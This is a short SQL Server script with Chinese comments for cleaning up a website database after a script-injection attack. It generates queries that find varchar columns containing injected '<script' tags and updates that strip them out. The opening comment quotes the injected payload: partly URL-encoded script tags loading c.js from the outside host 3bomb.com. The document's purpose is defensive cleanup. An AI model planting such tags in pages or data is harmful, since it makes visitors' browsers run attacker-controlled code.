/*
恶意代码:<script src=http://3bomb.c%6Fm/c.js></script><script src=http://%33bomb.com/c.js></script><script src=http://%33bomb.com/c.js></script>
数据被加入恶意代码:加货<script src=http://3bomb.c%6Fm/c.js></script><script src=http://%33bomb.com/c.js></script><script src=http://%33bomb.com/c.js></script>
*/
--生成查询恶意代码的语句
SELECT N'select * from '+QUOTENAME(o.name)
+N' where '+ QUOTENAME(c.name)+ N' like ' + '''%<script%'''
from sysobjects o
join syscolumns c on o.id=c.id AND OBJECTPROPERTY(o.id,N'IsUserTable')=1
join systypes t on c.xusertype=t.xusertype
where t.name='varchar'
--生成替换恶意代码的脚本1
SELECT N'update '+QUOTENAME(o.name)
+N' set '+ QUOTENAME(c.name) + N' = replace(' + QUOTENAME(c.name) + ',''<script src=http://3bomb.c%6Fm/c.js></script>'','''')'
from sysobjects o
join syscolumns c on o.id=c.id AND OBJECTPROPERTY(o.id,N'IsUserTable')=1
join systypes t on c.xusertype=t.xusertype
where t.name='varchar'
--生成替换恶意代码的脚本2
SELECT N'update '+QUOTENAME(o.name)
+N' set '+ QUOTENAME(c.name) + N' = replace(' + QUOTENAME(c.name) + ',''<script src=http://3bomb.c%6Fm/c.js></script><script src=http://%33bomb.com/c.js></script><script src=http://%33bomb.com/c.js></script>'','''')'
from sysobjects o
join syscolumns c on o.id=c.id AND OBJECTPROPERTY(o.id,N'IsUserTable')=1
join systypes t on c.xusertype=t.xusertype
where t.name='varchar'